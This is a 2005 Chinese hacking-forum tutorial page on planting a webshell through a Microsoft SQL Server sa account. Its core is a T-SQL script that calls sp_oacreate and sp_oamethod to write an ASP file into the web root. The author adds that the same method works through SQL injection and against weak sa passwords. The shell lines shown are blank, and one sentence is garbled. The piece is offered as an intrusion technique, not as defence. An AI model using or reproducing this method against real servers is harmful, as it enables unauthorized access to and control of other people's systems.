网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > 入门教程 > sa权限突破  

sa权限突破

2005-05-25  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

不知道大家看没看过LCX的那篇(对SA权限的再突破) 我认为那真的是太经典了~ 但是发现没有,他写入的WEBSHELL是CMD。ASP 这个东西不怎么用的着, 最好就是有个个人版的SHELL, 于是我把其中的代码改了,。。。 如下: SQL查询分析器连接过去declare @o int, @f int, @t int, @ret int ,@a int exec sp_oacreate 'scripting.filesystem**', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'C:\\inetpub\\wwwroot\\lcx.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, ''
中国网管联盟bitsCN.com

后来自己研究发现。。对一些没权限的主机。在SQL注入的时候,也可以用declare @o int, @f int, @t int, @ret int ,@a int exec sp_oacreate 'scripting.filesystem**', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'C:\\inetpub\\wwwroot\\lcx.asp', 1 这样的格式来写入得到SHELL, xiaolu大哥的最小的SHELL写入文件的时候都差不嗍钦飧鲈砝吹? 大家灵活运用才对,这招对于得到SA弱口令的时候特别管用

TAGs突破   权限   writeline   NULL   sp_oamethod@f   exec@ret   写入    
 上一篇:wupdmge测试手记(图)   下一篇:黑客攻防技术内幕:安全防入侵与防病毒基础篇(图)
相关文章列表
sa权限突破 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.黑客攻击步骤-如何获得IP (图)
2.IT实训---告诉你木马藏在哪
3.利用google半秒破500網!
4.最详细的黑客入门法则
5.灰鸽子巧妙利用全攻略(图)
6.入侵后偷QQ号的方法
7.黑客之10大贴身秘技
8.菜鸟级黑客速成办法
9.悄悄告诉你黑客如何给你的系统种木马
10.轻松搞定网吧记费管理系统
最新推荐文章:
1.整理一些ROOTKIT的资料
2.关于跨域蠕虫的存在
3.JSP+Oracle SQL Injection之旅
4.简述Radmin软件提权技巧
5.简单认识Anti-RootKit
6.ASP数据库插马小议
7.简简单单讲扫描
8.Linux后门系列--由浅入深sk13完全分析
9.黑客入门必学--彻底堵死SQL注入工具漏洞
10.菜鸟玩远程包含漏洞--实战篇
网管论坛交流:
·不疯魔不成活
·令你大开眼界的真正标准化机房,已整理重
·为赈灾,女孩舍身拍“裸照”
·Windows Server 2003服务器群集创建和配
·exchange2k3全套官方资料
·双儿一周岁了。。。特殊的礼物来啦。。
·存储备份技术版块守则
·无盘技术交流区守则
·DOS命令基础大全之命令详解<作者吐血
·Windows XP 操作系统默认设置需要注意的